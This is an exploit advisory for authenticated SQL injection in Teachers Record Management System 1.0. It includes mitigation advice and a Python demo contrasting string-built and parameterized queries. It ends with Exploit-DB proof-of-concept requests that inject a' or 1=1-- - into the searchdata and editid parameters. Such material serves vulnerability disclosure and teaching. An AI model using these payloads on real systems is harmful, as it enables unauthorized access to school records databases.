Vendor: Teachers Record Management System
Author: nhattruong
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Teachers Record Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:phpgurukul:teachers_record_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10 + XAMPP v3.2.4
Year: 2021

Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)

Teachers Record Management System 1.0 is vulnerable to multiple authenticated SQL injection attacks. After logging in to the admin panel, an attacker can inject into the searchdata parameter sent by POST to admin/search.php, and into the editid parameter sent by GET to admin/edit-subjects-detail.php and admin/edit-teacher-detail.php. These values are placed into SQL queries without sanitization or parameterization, so the attacker controls the query logic: the sample payload a' or 1=1-- - turns the WHERE clause into a condition that matches every row, and the same injection points can be used to run attacker-chosen SQL against the application's database. Because a valid session is required, this issue does not bypass authentication; it lets any authenticated user reach data and queries the interface never intended to expose.

Mitigation:

Input validation alone is not a sufficient fix. Every query that includes user input should use prepared statements with bound parameters (mysqli or PDO in PHP) so that values such as searchdata and editid are never concatenated into SQL text. In addition, validate the type of each parameter before use (editid should be accepted only as an integer), and run the application with a database account limited to the privileges it needs, so that any remaining injection cannot read or modify unrelated tables.
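The difference between the vulnerable pattern and the fix, as an added example written for this page rather than code from the Teachers Record Management System project: it replays the advisory's payload against a string-built query and against a parameterized one, for both the search-style LIKE query and the editid lookup. It uses an in-memory SQLite table in place of the application's MySQL database; the table name tblteacher, the column names and the row data are constructed assumptions.

```python
import sqlite3

# Payload taken from the advisory above (the same one is used at all three injection points).
PAYLOAD = "a' or 1=1-- -"


def make_db():
    """Build an in-memory stand-in for the application's teacher table.

    Table and column names are assumptions for this illustration; the real
    application runs on MySQL and its schema is not shown on the page.
    """
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE tblteacher (id INTEGER PRIMARY KEY, name TEXT, subject TEXT);
        INSERT INTO tblteacher (name, subject) VALUES
            ('Alice', 'Mathematics'),
            ('Bob', 'Physics'),
            ('Carol', 'History');
        """
    )
    return con


def vulnerable_edit_lookup(con, editid):
    """String-built query of the kind behind edit-teacher-detail.php?editid=...

    Deliberately vulnerable: the parameter is spliced into the SQL text, so a
    quote in the value ends the literal and the rest is parsed as SQL.
    """
    sql = f"SELECT id, name FROM tblteacher WHERE id='{editid}'"
    return con.execute(sql).fetchall()


def safe_edit_lookup(con, editid):
    """Parameterized version: the value is bound and never parsed as SQL."""
    return con.execute(
        "SELECT id, name FROM tblteacher WHERE id=?", (editid,)
    ).fetchall()


def vulnerable_search(con, term):
    """String-built LIKE query of the kind behind admin/search.php (searchdata)."""
    sql = f"SELECT id, name FROM tblteacher WHERE name LIKE '%{term}%'"
    return con.execute(sql).fetchall()


def safe_search(con, term):
    """Parameterized LIKE: the wildcards are added to the bound value, not the SQL."""
    return con.execute(
        "SELECT id, name FROM tblteacher WHERE name LIKE ?", ("%" + term + "%",)
    ).fetchall()


def injected_rows(con):
    """Row count each variant returns for the advisory payload.

    The vulnerable variants return every row because 'or 1=1' rewrites the
    WHERE clause; the parameterized variants treat the payload as a plain
    string that matches nothing.
    """
    return {
        "vulnerable_edit": len(vulnerable_edit_lookup(con, PAYLOAD)),
        "safe_edit": len(safe_edit_lookup(con, PAYLOAD)),
        "vulnerable_search": len(vulnerable_search(con, PAYLOAD)),
        "safe_search": len(safe_search(con, PAYLOAD)),
    }


if __name__ == "__main__":
    db = make_db()
    for variant, count in injected_rows(db).items():
        print(f"{variant}: {count} row(s) returned for payload {PAYLOAD!r}")
```

The trailing "-- -" in the payload is there for MySQL, which only treats "--" as a comment when it is followed by whitespace; the extra " -" guarantees that even when the application appends nothing after the injected value. In the PHP application the equivalent fix is a mysqli or PDO prepared statement with the value bound as a parameter, plus an integer check on editid before the query is built.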

Exploit-DB raw data:

# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
# Date: 05-10-2021
# Exploit Author: nhattruong
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4

POC:
1. Go to url http://localhost/login.php
2. Login with default creds
3. Execute the payload

Payload #1:

POST /admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/search.php
Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
Upgrade-Insecure-Requests: 1

searchdata=a' or 1=1-- -&search=

Payload #2:

http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -

Payload #3:

http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -